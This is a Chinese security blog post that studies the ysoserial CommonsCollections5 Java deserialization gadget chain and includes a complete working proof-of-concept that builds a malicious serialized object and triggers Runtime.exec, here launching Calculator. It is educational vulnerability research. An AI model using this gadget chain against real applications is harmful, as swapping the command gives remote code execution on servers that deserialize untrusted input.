

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="yhy的个人博客">
  <meta name="author" content="yhy">
  <meta name="keywords" content="">
  
  <title>Java ysoserial学习之CommonsCollections5(四) - yhy&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"fireline.fun","root":"/","version":"1.8.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":true,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"https://hm.baidu.com/hm.js?613daf119ed9302ff8cc0e60daf78bfe","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>YHY</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tools/">
                <i class="iconfont icon-exp-fill"></i>
                辅助工具
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Java ysoserial学习之CommonsCollections5(四)">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      yhy
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-07-01 21:18" pubdate>
        2021年7月1日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      16
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Java ysoserial学习之CommonsCollections5(四)</h1>
            
              <p class="note note-info">
                
                  本文首发于微信公众号：<a target="_blank" href="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210320180703.jpg" rel="nofollow noopener noopener">谁不想当剑仙</a></br></br>本文最后更新于：2021年7月1日 晚上
                
              </p>
            
            <div class="markdown-body">
              <blockquote>
<p>  庆祝我伟大的党百年华诞🎉</p>
<p>  向伟大的祖国敬礼(‘-‘*ゞ</p>
</blockquote>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>上节说道在<strong>commons-collections-3.2.1.jar!/org/apache/commons/collections/keyvalue/TiedMapEntry.class</strong>类中，总共有三个函数调用了<strong>getValue</strong>函数：</p>
<ul>
<li><p>  <strong>toString</strong>    CC5   本文重点</p>
</li>
<li><p>  <strong>hashCode</strong>    CC6</p>
</li>
<li><p>  <strong>equals</strong>      CC7</p>
</li>
</ul>
<p>本文CommonsCollections6利用链的限制条件：</p>
<p>​    JDK版本：暂无限制、 CommonsCollections 3.1 - 3.2.1</p>
<p>实验环境:</p>
<p>​    JDK 1.8.0_261 、Commons-Collections 3.2.1 </p>
<h2 id="0x01-利用链"><a href="#0x01-利用链" class="headerlink" title="0x01 利用链"></a>0x01 利用链</h2><figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-comment">/*</span><br><span class="hljs-comment">	Gadget chain:</span><br><span class="hljs-comment">        ObjectInputStream.readObject()</span><br><span class="hljs-comment">            BadAttributeValueExpException.readObject()</span><br><span class="hljs-comment">                TiedMapEntry.toString()</span><br><span class="hljs-comment">                    LazyMap.get()</span><br><span class="hljs-comment">                        ChainedTransformer.transform()</span><br><span class="hljs-comment">                            ConstantTransformer.transform()</span><br><span class="hljs-comment">                            InvokerTransformer.transform()</span><br><span class="hljs-comment">                                Method.invoke()</span><br><span class="hljs-comment">                                    Class.getMethod()</span><br><span class="hljs-comment">                            InvokerTransformer.transform()</span><br><span class="hljs-comment">                                Method.invoke()</span><br><span class="hljs-comment">                                    Runtime.getRuntime()</span><br><span class="hljs-comment">                            InvokerTransformer.transform()</span><br><span class="hljs-comment">                                Method.invoke()</span><br><span class="hljs-comment">                                    Runtime.exec()</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">	Requires:</span><br><span class="hljs-comment">		commons-collections</span><br><span class="hljs-comment"> */</span><br></code></pre></div></td></tr></table></figure>

<p>这里重点看**BadAttributeValueExpException.readObject()<strong>和</strong>TiedMapEntry.toString()**，其他的都和前面两章一样 <a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzkzODIwMTIwNg==&mid=2247484514&idx=1&sn=2552ec324c1395c9c3c8b9f78cbb4908&chksm=c2829d7bf5f5146d1d2dd0531344262a31b44f27d8c56c7465a9d0555c8773bc096424a0dd53&scene=0&xtrack=1#rd">Java ysoserial学习之CommonsCollections1(二)</a>、<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzkzODIwMTIwNg==&mid=2247484560&idx=1&sn=8a997456a5ccc09a4c11208e92c31093&chksm=c2829d89f5f5149f8000c1070e28eaf3049847b41e1377bf68f1074f7163ee7071eb61c84695&scene=0&xtrack=1#rd">Java ysoserial学习之CommonsCollections6(三)</a></p>
<h3 id="1-1-TiedMapEntry-toString"><a href="#1-1-TiedMapEntry-toString" class="headerlink" title="1.1 TiedMapEntry.toString()"></a>1.1 TiedMapEntry.toString()</h3><p>上一节说过解决<strong>Java高版本利用</strong>问题，实际上就是在找是否还有其他调用 <strong>LazyMap#get()</strong> 的地方，因为<strong>LazyMap</strong>对象是只要执行<strong>get</strong>方法就会调用<strong>transform</strong>，而<strong>transform</strong>的特性是可以执行任意方法。</p>
<p>CC6中是在<strong>TiedMapEntry</strong>类中找到了<strong>hashCode</strong>方法中调用了<strong>map.get(key);</strong>,并且<strong>map</strong>是我们可控的<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701204945.png" srcset="/img/loading.gif" lazyload alt="image-20210630213657788"></p>
<p>而CC5中则是利用了<strong>TiedMapEntry#toString</strong>方法<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701204954.png" srcset="/img/loading.gif" lazyload alt="image-20210630212357694"></p>
<p>还是先实验一下，确定可以<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205000.png" srcset="/img/loading.gif" lazyload alt="image-20210630214320487"></p>
<p>但这还不够好，我们希望的是目标反序列化后直接触发命令的执行，因此我们需要找到一个类在反序列化后会直接触发 <strong>TiedMapEntry#toString</strong> 从而触发命令的执行。</p>
<h3 id="1-2-BadAttributeValueExpException-readObject"><a href="#1-2-BadAttributeValueExpException-readObject" class="headerlink" title="1.2 BadAttributeValueExpException.readObject()"></a>1.2 BadAttributeValueExpException.readObject()</h3><p>在ysoserial中是利用了 <strong>rt.jar!/javax/management/BadAttributeValueExpException.class#readObject</strong>方法来达到上述目的<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205412.png" srcset="/img/loading.gif" lazyload alt="image-20210630214951419"></p>
<blockquote>
<p>这里我们可以看到<strong>BadAttributeValueExpException</strong>并没有实现<strong>Serializable</strong>接口,为什么可以序列化？<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205417.png" srcset="/img/loading.gif" lazyload alt="image-20210701200642699"></p>
<p>其实是<strong>BadAttributeValueExpException</strong>继承了<strong>Exception</strong>，<strong>Exception</strong>又继承了<strong>Throwable</strong>，<strong>Throwable</strong>实现了<strong>Serializable</strong>接口<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205421.png" srcset="/img/loading.gif" lazyload alt="image-20210701200756489"></p>
</blockquote>
<p>在<strong>BadAttributeValueExpException#readObject</strong>中发现<strong>get</strong>函数获取<strong>val</strong>的值然后赋给<strong>valObj</strong>，然后在符合<strong>第二个else if</strong>的情况下就会调用<strong>toString</strong>, 巧的是 <strong>System.getSecurityManager()</strong> 返回值默认为<strong>null</strong><img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205426.png" srcset="/img/loading.gif" lazyload alt="image-20210701201112074"></p>
<p>这样就只需要可以控制<strong>val</strong>的值就可以执行命令了。</p>
<p>然后我们发现在构造函数中就可以控制<strong>val</strong>的值，可以直接将<strong>tiedMapEntry</strong>作为参数传进去。</p>
<p><strong>注意</strong>:在构造函数中我们可以看到，当传入一个<strong>val</strong>，<strong>val</strong>就不等于<strong>null</strong>，会调用一次<strong>toString()<strong>方法,也就是说，创建</strong>BadAttributeValueExpException</strong>对象时会弹出一次计算器，而在我们的构想中，反序列化时也会弹出一次，总共是<strong>两</strong>次。<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205431.png" srcset="/img/loading.gif" lazyload alt="image-20210630220727451"></p>
<p>实验一下<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205435.png" srcset="/img/loading.gif" lazyload alt="image-20210630221313347"></p>
<p>但是，最终发现只弹了一次计算器，也就是说在反序列化时并没有执行<strong>toString</strong>方法，进而执行命令。</p>
<p>直接在<strong>BadAttributeValueExpException#readObject</strong>下断点Debug一下,会发现这时<strong>valObj</strong>是一个字符串了，直接进入了<strong>第一个 else if <strong>判断中，并没有进入</strong>第二个 else if <strong>，这是因为在创建</strong>BadAttributeValueExpException</strong>对象时，<strong>val</strong>已经执行过了一次<strong>toString</strong>方法，变成了字符串，所以匹配到了**第一个 else if **判断<img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205443.png" srcset="/img/loading.gif" lazyload alt="image-20210630221828997"></p>
<p>要想改变<strong>val</strong>的值就需要用到前面反复提到的<strong>反射</strong>了</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-comment">// 利用反射修改 BadAttributeValueExpException 中的 val 为 tiedMapEntry</span><br>BadAttributeValueExpException bad = <span class="hljs-keyword">new</span> BadAttributeValueExpException(<span class="hljs-number">1</span>);<br>Field val = bad.getClass().getDeclaredField(<span class="hljs-string">&quot;val&quot;</span>);<br>val.setAccessible(<span class="hljs-keyword">true</span>);<br>val.set(bad, tiedMapEntry);<br></code></pre></div></td></tr></table></figure>

<p><img src="https://gitee.com/yhy0/pic-go-img/raw/master/WX/20210701205451.png" srcset="/img/loading.gif" lazyload alt="image-20210701204112054"></p>
<p>完整代码</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">import</span> org.apache.commons.collections.Transformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.LazyMap;<br><br><span class="hljs-keyword">import</span> javax.management.BadAttributeValueExpException;<br><span class="hljs-keyword">import</span> java.io.FileInputStream;<br><span class="hljs-keyword">import</span> java.io.FileOutputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Map;<br><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@author</span> yhy</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@date</span> 2021/6/30 21:05</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@github</span> https://github.com/yhy0</span><br><span class="hljs-comment"> */</span><br><br><span class="hljs-comment">/*</span><br><span class="hljs-comment">	Gadget chain:</span><br><span class="hljs-comment">        ObjectInputStream.readObject()</span><br><span class="hljs-comment">            BadAttributeValueExpException.readObject()</span><br><span class="hljs-comment">                TiedMapEntry.toString()</span><br><span class="hljs-comment">                    LazyMap.get()</span><br><span class="hljs-comment">                        ChainedTransformer.transform()</span><br><span class="hljs-comment">                            ConstantTransformer.transform()</span><br><span class="hljs-comment">                            InvokerTransformer.transform()</span><br><span class="hljs-comment">                                Method.invoke()</span><br><span class="hljs-comment">                                    Class.getMethod()</span><br><span class="hljs-comment">                            InvokerTransformer.transform()</span><br><span class="hljs-comment">                                Method.invoke()</span><br><span class="hljs-comment">                                    Runtime.getRuntime()</span><br><span class="hljs-comment">                            InvokerTransformer.transform()</span><br><span class="hljs-comment">                                Method.invoke()</span><br><span class="hljs-comment">                                    Runtime.exec()</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">	Requires:</span><br><span class="hljs-comment">		commons-collections</span><br><span class="hljs-comment"> */</span><br><span class="hljs-comment">/*</span><br><span class="hljs-comment">This only works in JDK 8u76 and WITHOUT a security manager</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70</span><br><span class="hljs-comment"> */</span><br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">CommonCollections5</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;<br>        <span class="hljs-comment">//此处构建了一个transformers的数组，在其中构建了任意函数执行的核心代码</span><br>        Transformer[] transformers = <span class="hljs-keyword">new</span> Transformer[]&#123;<br>                <span class="hljs-keyword">new</span> ConstantTransformer(Runtime.class),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;String.class, Class[].class&#125;,<br>                        <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">null</span>&#125;),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;Object.class, Object[].class&#125;,<br>                        <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-keyword">null</span>, <span class="hljs-keyword">null</span>&#125;),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;String.class&#125;,<br>                        <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;/System/Applications/Calculator.app/Contents/MacOS/Calculator&quot;</span>&#125;),<br>                <span class="hljs-keyword">new</span> ConstantTransformer(<span class="hljs-number">1</span>), <span class="hljs-comment">// 隐藏错误信息</span><br>        &#125;;<br>        Transformer transformerChain = <span class="hljs-keyword">new</span> ChainedTransformer(transformers);<br><br>        Map innerMap = <span class="hljs-keyword">new</span> HashMap();<br>        <span class="hljs-comment">//使用 LazyMap</span><br>        Map outerMap = LazyMap.decorate(innerMap,transformerChain);<br><br>        TiedMapEntry tiedMapEntry = <span class="hljs-keyword">new</span> TiedMapEntry(outerMap,<span class="hljs-string">&quot;yhy&quot;</span>);<br><span class="hljs-comment">//        tiedMapEntry.toString();</span><br><br>        <span class="hljs-comment">// 利用反射修改 BadAttributeValueExpException 中的 val 为 tiedMapEntry</span><br>        BadAttributeValueExpException bad = <span class="hljs-keyword">new</span> BadAttributeValueExpException(<span class="hljs-number">1</span>);<br>        Field val = bad.getClass().getDeclaredField(<span class="hljs-string">&quot;val&quot;</span>);<br>        val.setAccessible(<span class="hljs-keyword">true</span>);<br>        val.set(bad, tiedMapEntry);<br><br><span class="hljs-comment">//        // 序列化</span><br>        ObjectOutputStream oos = <span class="hljs-keyword">new</span> ObjectOutputStream(<span class="hljs-keyword">new</span> FileOutputStream(<span class="hljs-string">&quot;out.bin&quot;</span>));<br>        oos.writeObject(bad);<br><br>        <span class="hljs-comment">// 反序列化读取 out.bin 文件</span><br>        ObjectInputStream ois = <span class="hljs-keyword">new</span> ObjectInputStream(<span class="hljs-keyword">new</span> FileInputStream(<span class="hljs-string">&quot;out.bin&quot;</span>));<br>        ois.readObject();<br>    &#125;<br>&#125;<br></code></pre></div></td></tr></table></figure>



<h2 id="0x02-参考"><a href="#0x02-参考" class="headerlink" title="0x02 参考"></a>0x02 参考</h2><p>天下大木头师傅的 <a target="_blank" rel="noopener" href="https://www.yuque.com/tianxiadamutou/zcfd4v/ac9529#55fcdbc0">https://www.yuque.com/tianxiadamutou/zcfd4v/ac9529#55fcdbc0</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">漏洞原理</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">漏洞原理</a>
                    
                  </div>
                
              </div>

              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/06/27/Java%20ysoserial%E5%AD%A6%E4%B9%A0%E4%B9%8BCommonsCollections6(%E4%B8%89)/">
                        <span class="hidden-mobile">Java ysoserial学习之CommonsCollections6(三)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div id="msg">来杯奶茶</div>

    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/img/wechatpay.jpg" srcset="/img/loading.gif" lazyload alt="微信打赏"/>
          <p>微信打赏</p>
        </div>
    </div>
</div>

            

            <!-- Custom -->
            
              <div class="col-lg-7 mx-auto nopadding-x-md">
                <div class="container custom post-custom mx-auto">
                  <img src="https://cdn.jsdelivr.net/gh/yhy0/PicGoImg@master/JavaFX/20210618143758.png" srcset="/img/loading.gif" lazyload class="rounded mx-auto d-block mt-5">
                </div>
              </div>
            

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.lazyComments('valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#valine",
          app_id: "vID2hnAAj71HlTtLcwO4InbY-gzGzoHsz",
          app_key: "GB9a9tvf5zPbYaxUShE01qk1",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "robohash",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "https://vid2hnaa.lc-cn-n1-shared.com",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the
    <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments powered by Valine.</a>
  </noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>



    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/yhy0" target="_blank" rel="nofollow noopener"><span>YHY</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":true,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>



